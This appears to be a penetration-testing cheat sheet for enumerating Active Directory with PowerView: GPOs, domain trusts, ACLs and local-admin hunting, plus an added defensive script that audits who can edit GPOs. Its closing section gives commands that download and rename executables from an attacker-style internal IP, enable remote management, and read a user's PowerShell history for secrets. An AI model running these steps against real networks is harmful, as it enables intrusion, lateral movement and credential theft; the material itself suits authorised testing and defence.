GPOs Enumeration Active Directory Group Policy Objects

Exploring Active Directory Group Policy Objects (GPOs)

Introduction to Active Directory enumeration with PowerShell (PowerView) for penetration testers.

Understand how to start enumerating a Domain Controller and escalate your privileges inside the network.

GROUP POLICY (GPO) ENUMERATION

Get-NetGPO -ComputerName client-02.rfs.lab                 # GPOs applied to a given host
Find-GPOComputerAdmin -ComputerName client-02.rfs.lab      # who gets local admin on that host through GPO
Find-GPOLocation -UserName Rfs                             # hosts where a user is granted rights through GPO
Get-NetOU                                                  # organizational units in the domain

Enumerate Domain Trusts

Get-NetDomainTrust                 # trusts of the current domain
Get-NetForest                      # current forest
Get-NetForest -Forest rfs.lab      # a specific forest
Get-NetForestDomain                # all domains in the forest
Get-NetForestCatalog               # global catalog servers
Get-NetForestTrust                 # forest-level trusts

ACLs Enumeration

Get-ObjectAcl -SamAccountName "users" -ResolveGUIDs                                    # ACL of an object, GUIDs resolved to names
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}                              # ACLs of every GPO
Get-ObjectAcl -SamAccountName labuser -ResolveGUIDs -RightsFilter "ResetPassword"      # who can reset this user's password
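The defender's counterpart to the GPO ACL listing above is a delegation audit: every principal that can edit a GPO can change what that GPO pushes to every computer it applies to. The following script is an added example, not part of the original post or of PowerView; it uses the RSAT GroupPolicy module (Get-GPO, Get-GPPermission) and assumes an allowlist of expected editors that you adjust for your domain.

```powershell
# Added example: flag GPO edit rights held by principals outside an allowlist.
# Requires the RSAT GroupPolicy module and read access to the domain.
Import-Module GroupPolicy

# Assumed allowlist of principals expected to hold edit rights (adjust per domain).
$ExpectedEditors = @('Domain Admins', 'Enterprise Admins', 'SYSTEM',
                     'Group Policy Creator Owners')

# Permission levels that allow modifying the GPO itself.
$EditLevels = @('GpoEdit', 'GpoEditDeleteModifySecurity')

function Get-RiskyGpoDelegation {
    param([string]$Domain = $env:USERDNSDOMAIN)

    foreach ($gpo in Get-GPO -All -Domain $Domain) {
        # -All returns every ACE on the GPO, including inherited ones.
        foreach ($perm in Get-GPPermission -Guid $gpo.Id -All -Domain $Domain) {
            $level = $perm.Permission.ToString()
            if ($EditLevels -notcontains $level) { continue }
            if ($ExpectedEditors -contains $perm.Trustee.Name) { continue }

            [pscustomobject]@{
                GPO       = $gpo.DisplayName
                GpoId     = $gpo.Id
                Trustee   = "$($perm.Trustee.Domain)\$($perm.Trustee.Name)"
                SidType   = $perm.Trustee.SidType
                Right     = $level
                Inherited = $perm.Inherited
            }
        }
    }
}

# Every row is a GPO that someone outside the allowlist can modify; review or remove the delegation.
Get-RiskyGpoDelegation | Sort-Object GPO | Format-Table -AutoSize
```

Run it periodically (or after GPO changes) and compare the output against the previous run; a new row is a change in who controls policy, which is worth an alert.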

Enumerating Users and Local Admin Access

Find-LocalAdminAccess                  # hosts where the current user is a local administrator
Invoke-EnumerateLocalAdmin             # members of the local Administrators group on domain hosts
Invoke-UserHunter                      # hosts where domain users are logged on
Invoke-UserHunter -UserName "rfs"      # hosts where a specific user is logged on
Invoke-UserHunter -CheckAccess         # also check whether the current user has local admin on those hosts

Download Files

(New-Object Net.WebClient).DownloadFile("http://10.10.39.96:80/taskkill.exe","C:\Windows\Temp\rfs.exe")

Invoke-WebRequest

Invoke-WebRequest "http://10.10.39.96:80/rfs.exe" -OutFile "rfs.exe"

Windows Remote Management (WinRM)

Enable-PSRemoting -Force

PowerShell History

Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt